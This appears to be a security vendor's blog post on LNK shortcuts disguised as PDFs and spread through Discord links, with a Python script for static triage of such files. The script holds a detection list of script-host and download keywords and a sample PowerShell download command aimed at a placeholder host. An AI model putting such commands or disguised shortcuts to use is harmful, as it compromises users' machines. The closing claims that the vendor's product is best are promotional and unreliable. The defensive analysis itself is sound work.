LNK files are nothing new, and PDF files are nothing new. LNK files masquerading as PDF files are also nothing new on the threat landscape.
Now this is where it gets a bit more interesting: threat actors are leveraging Discord (also not new) to distribute payloads. You can link directly to a file hosted on Discord, which means a public server can link to a malicious file (Discord does not scan files) and make it accessible far and wide.
The malicious file could be something like the above (an LNK file masquerading as a PDF) which then downloads something malicious; before you know it your machine is compromised (especially if PowerShell scripting is part of the payload).
Example of what we are looking at (video):
- Malicious link provided to a file housed on Discord
- File is a LNK being disguised as a PDF file
- LNK file contains PowerShell code designed to download and run a malicious payload
- EXE file hits the machine and is launched
- Endpoint is compromised. This is generally a trojan that grants access to the threat actors.
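The chain above starts with a file that looks like a document but is really a Windows shortcut. The following Python is an added example (not from the original post or its security stack) showing how a defender can triage such a download statically: it checks the Shell Link header (size field and CLSID), walks the optional sections to reach the StringData fields, and flags a document extension on LNK content plus script-host or download keywords in the command line. The sample shortcut and the `example.invalid` URL are constructed for the demonstration; the keyword list is an assumption, not a vendor rule set.

```python
"""Static triage of a Windows Shell Link (.lnk) that claims to be a PDF (added example)."""
import re
import struct

LNK_HEADER_SIZE = 0x4C
# CLSID 00021401-0000-0000-C000-000000000046 in its on-disk (mixed-endian) byte order
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits from the Shell Link binary format (MS-SHLLINK)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# Assumed indicator list: a "document" should not launch a script host or fetch content
SUSPICIOUS_KEYWORDS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript",
                       "invoke-webrequest", "downloadstring", "downloadfile", "iex",
                       "-encodedcommand", "-enc", "frombase64string")


def is_lnk(data: bytes) -> bool:
    """True if data begins with a valid Shell Link header (size field and CLSID)."""
    return (len(data) >= LNK_HEADER_SIZE
            and struct.unpack_from("<I", data, 0)[0] == LNK_HEADER_SIZE
            and data[4:20] == LNK_CLSID)


def _read_string(data: bytes, offset: int, unicode: bool):
    """Read one StringData entry: 2-byte character count, then the characters (not NUL-terminated)."""
    count = struct.unpack_from("<H", data, offset)[0]
    offset += 2
    if unicode:
        raw = data[offset:offset + count * 2]
        return raw.decode("utf-16-le", errors="replace"), offset + count * 2
    raw = data[offset:offset + count]
    return raw.decode("latin-1"), offset + count


def parse_lnk_strings(data: bytes) -> dict:
    """Return the StringData fields present in the shortcut, keyed by field name."""
    if not is_lnk(data):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    offset = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        # IDListSize does not include its own 2 bytes
        offset += 2 + struct.unpack_from("<H", data, offset)[0]
    if flags & HAS_LINK_INFO:
        # LinkInfoSize includes the 4-byte size field itself
        offset += struct.unpack_from("<I", data, offset)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for flag, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if flags & flag:
            fields[key], offset = _read_string(data, offset, unicode)
    return fields


def triage(filename: str, data: bytes) -> list:
    """Return findings for a downloaded file; an empty list means nothing stood out."""
    findings = []
    if not is_lnk(data):
        return findings
    lower = filename.lower()
    if not lower.endswith(".lnk"):
        findings.append(f"extension '{lower.rsplit('.', 1)[-1]}' does not match LNK content")
    if ".pdf" in lower or ".doc" in lower:
        findings.append("document extension embedded in filename (Explorer hides the trailing .lnk)")
    fields = parse_lnk_strings(data)
    command = " ".join(fields.get(k, "") for k in ("relative_path", "arguments")).lower()
    # Whole-token match so "-enc" does not fire on "-encodedcommand" and "iex" not on "iexplore"
    hits = [kw for kw in SUSPICIOUS_KEYWORDS
            if re.search(r"(?<![a-z0-9])" + re.escape(kw) + r"(?![a-z0-9])", command)]
    if hits:
        findings.append("script host / download keywords in command line: " + ", ".join(hits))
    return findings


def _string_data(text: str) -> bytes:
    """Encode one Unicode StringData entry (count + UTF-16LE characters)."""
    return struct.pack("<H", len(text)) + text.encode("utf-16-le")


def build_sample_lnk() -> bytes:
    """CONSTRUCTED sample: minimal Unicode LNK with only a relative path and arguments."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sI", LNK_HEADER_SIZE, LNK_CLSID, flags)
    header += bytes(LNK_HEADER_SIZE - len(header))  # attributes, timestamps, etc. left zero
    args = '-NoProfile -Command "Invoke-WebRequest http://example.invalid/stage2"'
    return header + _string_data("powershell.exe") + _string_data(args)


if __name__ == "__main__":
    for finding in triage("Invoice.pdf.lnk", build_sample_lnk()):
        print("FINDING:", finding)
```

Run it against a quarantined download before anyone double-clicks it; a real shortcut that includes a LinkTargetIDList or LinkInfo section is skipped over by the size fields, so the StringData parsing still lands on the arguments.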
It happens that quickly, but there is a silver lining: our security stack is capable of preventing the LNK file outright. Other solutions are not that successful and it gets to the point of running the PowerShell script; more good news on our side: we kill the PS script based on our contextual scripting engine.
This is why we leverage the best security solution possible, and why it proves time after time to be the best choice when it comes to endpoint security. Prevention is far better than "wait and see" (also known as detect and respond / detect and remediate).
Thank you for your attention to this matter. If you have any questions or concerns, do not hesitate to reach out.